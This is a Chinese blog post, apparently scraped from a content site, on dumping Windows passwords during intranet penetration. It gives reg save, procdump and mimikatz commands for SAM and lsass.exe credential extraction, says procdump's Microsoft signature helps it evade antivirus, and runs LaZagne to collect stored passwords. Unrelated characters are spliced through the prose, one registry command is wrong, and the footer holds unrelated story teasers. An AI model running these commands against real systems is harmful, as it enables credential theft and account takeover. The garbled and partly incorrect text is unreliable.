內(nèi)網(wǎng)滲透-密碼抓取

Mimikatz

Mimikatz又被稱為法國(guó)大面包蛔六,是一款windows平臺(tái)的神器帕胆,他最顯著的功能就是從lsass.exe中抓取密碼朝捆,此外它還可以用于提權(quán)、注入進(jìn)程懒豹,讀取進(jìn)程內(nèi)存等操作芙盘。但是Mimikatz沒(méi)有經(jīng)過(guò)處理直接扔到服務(wù)器上,200%會(huì)被殺軟殺掉脸秽。因此儒老,我們需要通過(guò)別的手段去抓取數(shù)據(jù)到本地。

下載地址:https://github.com/gentilkiwi/mimikatz/releases

通過(guò)注冊(cè)表抓取

獲取注冊(cè)表中的信息:

reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv
reg save HKLM\SYSTEM c:\windows\temp\Sam.hiv

執(zhí)行這兩條命令需要管理員權(quán)限

把這兩個(gè)文件拉取到本地记餐,執(zhí)行命令:

mimikatz "lsadump::sam /sam:Sam.hiv /system:Sys.hiv" exit

lsass.exe內(nèi)存抓取

如果有一些賬號(hào)登錄本機(jī)驮樊,如域管理員等,這些登錄信息會(huì)被儲(chǔ)存在lsass.exe這個(gè)進(jìn)程中片酝,通過(guò)內(nèi)存抓取可以獲得這些信息囚衔。
用到的工具:Procdump,此工具有微軟的官方簽名雕沿,大部分的殺軟都不會(huì)查殺
下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/
將對(duì)應(yīng)的Procdump上傳到服務(wù)器中练湿,執(zhí)行

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

將生成的dmp文件拉到本地,執(zhí)行命令

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

在windows 2008前密碼都是明文存儲(chǔ)审轮,在2008之后系統(tǒng)會(huì)進(jìn)行hash加密再存儲(chǔ)

LaZagne

下載地址 http://github.com/AlessandroZ/LaZagne
下載源碼肥哎,并按照github上的說(shuō)明安裝一些模塊辽俗,在python3下的環(huán)境運(yùn)行

python3 laZagne.py all 

LaZagne可以抓取多種在計(jì)算機(jī)中儲(chǔ)存的密碼,如vnc篡诽、瀏覽器存儲(chǔ)的密碼榆苞、數(shù)據(jù)庫(kù)密碼、Hashdump等霞捡。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末坐漏,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子碧信,更是在濱河造成了極大的恐慌赊琳,老刑警劉巖,帶你破解...
    沈念sama閱讀 221,635評(píng)論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件砰碴,死亡現(xiàn)場(chǎng)離奇詭異躏筏,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)呈枉,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,543評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門趁尼,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人猖辫,你說(shuō)我怎么就攤上這事酥泞。” “怎么了啃憎?”我有些...
    開(kāi)封第一講書人閱讀 168,083評(píng)論 0 360
  • 文/不壞的土叔 我叫張陵芝囤,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我辛萍,道長(zhǎng)悯姊,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書人閱讀 59,640評(píng)論 1 296
  • 正文 為了忘掉前任贩毕,我火速辦了婚禮悯许,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘辉阶。我一直安慰自己先壕,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,640評(píng)論 6 397
  • 文/花漫 我一把揭開(kāi)白布睛藻。 她就那樣靜靜地躺著启上,像睡著了一般。 火紅的嫁衣襯著肌膚如雪店印。 梳的紋絲不亂的頭發(fā)上冈在,一...
    開(kāi)封第一講書人閱讀 52,262評(píng)論 1 308
  • 那天,我揣著相機(jī)與錄音按摘,去河邊找鬼包券。 笑死纫谅,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的溅固。 我是一名探鬼主播付秕,決...
    沈念sama閱讀 40,833評(píng)論 3 421
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼侍郭!你這毒婦竟也來(lái)了询吴?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書人閱讀 39,736評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤亮元,失蹤者是張志新(化名)和其女友劉穎猛计,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體爆捞,經(jīng)...
    沈念sama閱讀 46,280評(píng)論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡奉瘤,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,369評(píng)論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了煮甥。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片盗温。...
    茶點(diǎn)故事閱讀 40,503評(píng)論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖成肘,靈堂內(nèi)的尸體忽然破棺而出卖局,到底是詐尸還是另有隱情,我是刑警寧澤艇劫,帶...
    沈念sama閱讀 36,185評(píng)論 5 350
  • 正文 年R本政府宣布吼驶,位于F島的核電站,受9級(jí)特大地震影響店煞,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜风钻,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,870評(píng)論 3 333
  • 文/蒙蒙 一顷蟀、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧骡技,春花似錦鸣个、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書人閱讀 32,340評(píng)論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至是趴,卻和暖如春涛舍,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背唆途。 一陣腳步聲響...
    開(kāi)封第一講書人閱讀 33,460評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工富雅, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留掸驱,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,909評(píng)論 3 376
  • 正文 我出身青樓没佑,卻偏偏與公主長(zhǎng)得像毕贼,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子蛤奢,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,512評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容